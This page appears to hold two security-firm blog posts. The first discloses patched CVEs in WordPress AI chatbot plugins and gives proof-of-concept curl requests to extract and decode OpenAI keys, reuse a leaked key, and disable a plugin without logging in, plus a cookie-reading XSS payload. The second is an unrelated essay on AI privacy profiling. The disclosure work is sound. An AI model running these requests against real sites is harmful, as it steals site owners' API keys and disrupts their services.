WordPress AI Plugins: Tell me a secret 

In our previous blog ‘WordPress Plugins: AI-dentifying Chatbot Weak Spots’ (https://prisminfosec.com/wordpress-plugins-ai-dentifying-chatbot-weak-spots/), a series of issues were identified within AI-related WordPress plugins:

  • CVE-2024-6451 – Admin+ Remote Code Execution (RCE) 
  • CVE-2024-6723 – Admin+ SQL Injection (SQLi) 
  • CVE-2024-6847 – Unauthenticated SQL Injection (SQLi) 
  • CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS) 

Today, we will be looking at further vulnerability types within these plugins that don’t provide the same adrenaline rush as popping a shell, but clearly show how AI plugins are being rushed through development without thorough consideration for secure coding practices. Prism Infosec was credited with the following CVEs:

  • CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 
  • CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

All of the vulnerabilities above were submitted to WPScan, who coordinated the remediation steps with the respective plugin owners.

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26 

‘The plugin does not have proper authorisation in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key’

Within the plugin source code, specifically the ‘wdgpt-api-requests.php’ file, a REST route of ‘/wp-json/wdgpt/v1/api-key’ was identified that allowed unauthenticated requests to retrieve the encoded OpenAI secret key configured within the plugin settings.

Figure 1: wdgpt_retrieve_api_key identified in source code. 

Upon reviewing the ‘wdgpt_retrieve_api_key’ function, an interesting check was found to be performed on a ‘key’ parameter sent within the request, whereby the value was compared against a (not so) secret code.

Figure 2: Secret code exposed in source code alongside OpenAI key decoding logic. 

In order for the request to be successful, a JSON value of {"key":"U2FsdGVkX1+X"} needed to be sent within the POST request.

This secret code remained unchanged across all plugin installations; combining it with the unauthenticated endpoint ‘/wp-json/wdgpt/v1/api-key’ allowed the ROT13-encoded OpenAI secret key to be retrieved.

Figure 3: OpenAI API key retrieval. 
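A request of roughly the following shape would therefore return the encoded key to any unauthenticated visitor. This is a sketch only, assuming the endpoint accepts a JSON POST body as described above; ‘example.com’ is a placeholder target.

#!/bin/bash
# Sketch only: request the encoded OpenAI key from a vulnerable SmartSearchWP (< 2.4.6) install.
# 'example.com' is a placeholder; the 'key' value is the static secret code described above.
curl -s -X POST "https://example.com/wp-json/wdgpt/v1/api-key" \
  -H "Content-Type: application/json" \
  -d '{"key":"U2FsdGVkX1+X"}'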

Decoding the ROT13-encoded key with the following Bash script revealed the OpenAI key in use.

#!/bin/bash
# ROT13-decode the value passed as the first argument, e.g. ./rot13.sh "<encoded_key>"
echo "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/061eab97-4a84-4738-a1e8-ef9a1261ff73 

‘The plugin discloses the OpenAI API Key, allowing unauthenticated users to obtain it’

Similar to the previous issue (but somehow worse), the OpenAI secret key was found to be disclosed to all users of the chatbot. The Authorization header contained the plaintext value of the API key set within the plugin configuration. This allowed an unauthenticated user to compromise the OpenAI secret key set in the application simply by sending a message through the chatbot.  

Configuration of the OpenAI API key resided within the admin console located at the following URL:  

  • /wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3&status=saved 

Once set, the chatbot functionality was available to unauthenticated users by default. By intercepting the chatbot’s traffic, it was identified that a client-side request was being sent directly to OpenAI, containing the secret key within the Authorization header.

Request: 

POST /v1/chat/completions HTTP/2
Host: api.openai.com
Content-Length: 312
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Content-Type: application/json
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer sk-proj-oL…[REDACTED]…sez

{"temperature":0.8,"top_p":1,"max_tokens":1500,"frequency_penalty":0.01,"presence_penalty":0.01,"model":"gpt-3.5-turbo-16k","messages":[{"role":"system","content":"Converse as if you are an AI assistant. Answer the question as truthfully as possible. Language: English. "},{"role":"user","content":"Hi there!"}]}
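
Any unauthenticated visitor who proxies their own chatbot traffic therefore obtains a working OpenAI key. As a rough illustration of the impact, a leaked key of this form could be reused directly against the OpenAI API, for example to list the models available to the compromised account (a sketch only; the key is redacted):

#!/bin/bash
# Sketch only: reuse a leaked OpenAI API key against the public OpenAI API.
curl -s https://api.openai.com/v1/models \
  -H "Authorization: Bearer sk-proj-...[REDACTED]..."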

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 

WPScan: https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664 

‘The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ‘ays_chatgpt_disconnect’, ‘ays_chatgpt_connect’, and ‘ays_chatgpt_save_feedback’’ 

During source code analysis of the plugin, an AJAX handler named ‘ays_chatgpt_admin_ajax’, registered via the unauthenticated ‘wp_ajax_nopriv’ hook, was identified.

Figure 4: Unauthenticated admin endpoint identified in source code. 

Upon further inspection of the function within the file ‘class-chatgpt-assistant-admin.php’, a ‘function’ parameter sent within the request was first checked for a null value before being passed to PHP’s ‘is_callable’, which is documented as verifying ‘that a value can be called as a function from the current scope’.

This essentially allowed for any function within the scope of ‘class-chatgpt-assistant-admin.php’ to be called.  

Figure 5: Function parameter value passed to is_callable() to access specified function. 

The functions that could be accessed from an unauthenticated context included:  

  • ays_chatgpt_disconnect 
  • ays_chatgpt_connect 
  • ays_chatgpt_save_feedback 

By sending the following request from an unauthenticated context, it was possible to ‘disconnect’ the current running configuration from OpenAI, effectively causing a denial of service of the chatbot functionality.

Figure 6: Disconnecting the plugin configuration from OpenAI. 
Figure 7: api_key setting updated to empty value. 
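
For illustration, a request equivalent to the one shown in Figure 6 could look roughly like the following. This is a sketch only; the admin-ajax ‘action’ and ‘function’ parameter names are taken from the handler described above, and ‘example.com’ is a placeholder target.

#!/bin/bash
# Sketch only: call the unauthenticated AJAX handler and invoke ays_chatgpt_disconnect,
# wiping the stored OpenAI configuration and breaking the chatbot.
curl -s -X POST "https://example.com/wp-admin/admin-ajax.php" \
  -d "action=ays_chatgpt_admin_ajax" \
  -d "function=ays_chatgpt_disconnect"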

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

WPScan: https://wpscan.com/vulnerability/ce909d3c-2ef2-4167-87c4-75b5effb2a4d 

‘The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)’

Testing identified that the plugin’s settings functionality did not effectively sanitise inputs, allowing malicious payloads such as JavaScript code to be accepted and later executed within the chatbot instances presented to visiting users.

As seen in the screenshot below, the payload ‘<img src=123 onerror=alert(document.cookie)>’ was inserted into the Starting Message input within the settings page located at:

  • /wp-admin/options-general.php?page=chatbot-support-ai-settings 

Figure 8: XSS payload injected into chatbot starting message value. 

As a result, the JavaScript was executed within chatbot instances whenever users visited the application.

Figure 9: XSS payload triggered on new instance of chatbot. 

It is accepted that this vulnerability required administrator privileges to set up; however, as the issue impacted all visiting users, it would allow malicious scripts to be distributed through the plugin, which could lead to further attacks against third-party services under the guise of the visiting users’ browsers.

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing 

All vulnerabilities were discovered and written by Kieran Burge of Prism Infosec.  

The Dark side of AI Part 2: Big brother  

AI: Data source or data sink?

The idea of artificial intelligence is not a new one. For decades, people have been finding ways to emulate the pliable nature of the human brain, with machine learning being mankind’s latest attempt. Artificial intelligence models are expected to learn how to form appropriate responses to a given set of inputs. With each “incorrect” response, the model iteratively modifies its behaviour until a “correct” response is reached, without further outside intervention.

To achieve this, a model is fed vast amounts of training data, which typically includes the interactions of end users themselves. Well-known AI models such as those behind ChatGPT and Llama are made available to a large population. That is a lot of input captured by a select few entities, and it all has to be stored [1] somewhere before being fed into training.

And that is a lot of responsibility for the data holders, who must make sure it does not fall into the wrong hands. In fact, in March 2023 [2] OpenAI stated that it would no longer use customer input as training data for its ChatGPT models; incidentally, in a later report in July 2024, OpenAI remarked that it had suffered a data breach in early 2023 [3]. Though the company claims no customer or partner information was accessed, at this point we only have its word to go by.

AI companies are like any other tech company: they still must store and process data, and with that they carry the same targets on their backs.

The nature of nurturing AI

As with a child learning from a parent, an AI model begins to learn from the data it is fed and may start to spot trends in the datasets. These trends then manifest as something akin to opinions, whereby the AI attempts to provide a response that it thinks will satisfy the user.

Put another way, companies can leverage AI to understand the preferences [4] of each user and serve content or services that closely match their tastes, arguably to a finer level of detail than traditional approaches. User data is too valuable an asset for companies and attackers alike to pass up, and it is no secret that everyone using AI ends up with a unique profile tailored to them.

Surpassing the creator?

It’s also no secret that, in one form or another, these profiles can be used to influence big decisions. For instance, AI is increasingly being used to aid [5] medical professionals in analysing ultrasound measurements and predicting chronic illnesses such as cardiovascular disease. The time saved in making those decisions can literally be a matter of life and death.

However, this can be turned on its head if AI is used as a crutch [6] rather than as an aid. Imagine a scenario where a company is looking to hire and decides to use an AI to profile all candidates before interview. For this to work, each candidate must submit some basic personal information, after which the AI scours the internet for other pieces of data pertaining to the individual. With potentially hundreds of candidates to choose from, the recruiter may lean on the AI and base their choice on its decision. Logically speaking, this seems wise: a recruiter would not want to hire someone who is qualified but has a questionable work ethic or a history of being a liability.

While this effectively automates the same process a recruiter would carry out themselves, it would be disheartening for a candidate to be denied an interview on the basis of a background profile the AI has created of them, which may not be fully accurate, even if they meet the job requirements. Conversely, another candidate may be hired because of a more favourable background profile yet in reality be underqualified for the job; in both cases the profile is not a true representation of the candidate.

Today, AI is not yet mature enough to discern what is true of a person and what is not: it sees data for what it is and acts upon it regardless. All the while, it continues to erode the privacy of the user and build an imperfect profile which could impact their lives for better or worse.

Final conclusions

As the saying goes, if there is no price for the product, then the user is the product. With AI, even if users are charged a price, whatever companies may say, they will become part of the product one way or another. Many users choose to accept this so long as big tech keeps its word on keeping their information safe and secure. But one should ask: safe and secure from whom?

References

This post was written by Leon Yu.